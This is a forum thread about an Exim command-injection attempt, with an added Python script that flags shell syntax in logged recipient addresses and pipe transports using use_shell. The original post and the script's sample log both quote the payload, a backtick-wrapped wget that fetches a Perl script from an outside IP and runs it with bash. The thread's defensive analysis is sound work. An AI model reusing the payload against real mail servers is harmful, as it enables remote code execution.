Remote Command Execution

LawsHosting

Quick question.

Yesterday (first time ever) I noticed some emails in our queue with the To field set to
red`wget${ifs}178.218.211.118/b${ifs}-o${ifs}/tmp/a.pl``bash${ifs}/tmp/a.pl`[email protected]
I know this is probably not serious (well, it's been around since March), but just want to make sure our Exim (SB4.1) & Dovecot configs are okay.

Source: Redteam

Related post here

Edit: The config(s) doesn't have use_shell, so we are safe.

However, does anyone know how these get into our boxes, via other MTAs or auth systems?

Thanks.
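A defender-side check for the two points raised in this post (whether any pipe transport has use_shell enabled, and which queued messages carry recipient addresses like the one above) is shown below. This is an added example, not code from the thread, from Exim or from the SpamBlocker config; the log and transport text are constructed samples, the function names are my own assumptions, and the IP addresses are RFC 5737 placeholders rather than the real one quoted in the post.

```python
import re
from typing import Dict, List, Optional

# Shell metacharacters and ${...} expansions never appear in a legitimate
# local part, but they are the signature of a command-injection attempt
# against an MTA that hands addresses to a shell (the ${ifs} token stands
# in for whitespace so the address survives as a single word).
SUSPICIOUS = re.compile(r"`|\$\{|\$\(|[|;<>]")

# Constructed sample lines loosely in the shape of Exim mainlog "<=" arrival
# entries; only the message id, the [ip] token and the " for " field matter.
SAMPLE_MAINLOG = """\
2019-06-10 09:12:01 1hAbCd-000123-Xy <= bob@example.net H=(mail.example.net) [192.0.2.10] P=esmtp S=1842 for postmaster@example.org
2019-06-10 09:12:05 1hAbCd-000124-Xz <= <> H=(x) [192.0.2.77] P=esmtp S=1210 for "red`wget${ifs}192.0.2.77/b${ifs}-o${ifs}/tmp/a.pl``bash${ifs}/tmp/a.pl`"@example.org
2019-06-10 09:13:40 1hAbCd-000125-Ya <= alice@example.com H=(mx.example.com) [192.0.2.20] P=esmtps S=9981 for root@example.org sales@example.org
"""


def parse_arrival(line: str) -> Optional[Dict[str, object]]:
    """Extract message id, peer IP and recipient list from an Exim '<=' line."""
    if " <= " not in line or " for " not in line:
        return None
    head, _, recipients = line.rpartition(" for ")
    ip = re.search(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]", head)
    return {
        "message_id": head.split()[2],
        "source_ip": ip.group(1) if ip else None,
        # Injected addresses use ${ifs} instead of spaces, so whitespace
        # still separates one recipient from the next.
        "recipients": recipients.split(),
    }


def flag_suspicious_recipients(log_text: str) -> List[Dict[str, object]]:
    """Return arrivals whose recipient addresses contain shell syntax."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_arrival(line)
        if rec is None:
            continue
        bad = [r for r in rec["recipients"] if SUSPICIOUS.search(r)]
        if bad:
            hits.append({"message_id": rec["message_id"],
                         "source_ip": rec["source_ip"],
                         "recipients": bad})
    return hits


# Constructed transports section: one pipe transport deliberately has the
# risky option set so the checker has something to report.
SAMPLE_TRANSPORTS = """\
remote_smtp:
  driver = smtp

address_pipe:
  driver = pipe
  return_output

legacy_filter:
  driver = pipe
  use_shell        # bare boolean option means true in Exim syntax
  command = /usr/local/bin/filter $local_part
"""


def pipe_transports_using_shell(config_text: str) -> List[str]:
    """Return names of pipe transports whose use_shell option is enabled."""
    risky: List[str] = []
    name, driver, use_shell = None, None, False

    def finish() -> None:
        if name and driver == "pipe" and use_shell:
            risky.append(name)

    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0].rstrip()
        if not line:
            continue
        # A non-indented "name:" line starts a new transport block.
        if not line[0].isspace() and line.endswith(":"):
            finish()
            name, driver, use_shell = line[:-1].strip(), None, False
            continue
        key, _, value = (part.strip() for part in line.partition("="))
        if key == "driver":
            driver = value
        elif key == "use_shell":
            use_shell = value.lower() in ("", "true", "yes")
        elif key == "no_use_shell":
            use_shell = False
    finish()
    return risky


if __name__ == "__main__":
    for hit in flag_suspicious_recipients(SAMPLE_MAINLOG):
        print("suspicious recipient:", hit)
    print("pipe transports with use_shell:",
          pipe_transports_using_shell(SAMPLE_TRANSPORTS))
```

Run against a real mainlog by replacing SAMPLE_MAINLOG with the file contents; the peer IP in each hit is what you would feed to a firewall rule, and a non-empty result from pipe_transports_using_shell is the thing to fix in the transport configuration before worrying about the queue.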
However, does anyone know how these get into our boxes, via other MTAs or auth systems?
I got the same mail and from the same ip (I blocked it). I can't find out how, but for some reason it was delivered to my [email protected] mailbox.
Since postmaster points to root, and root in turn points to my technical email address in the aliases file, that is how it got into my mailbox.

I presume it got into your mailbox a similar way.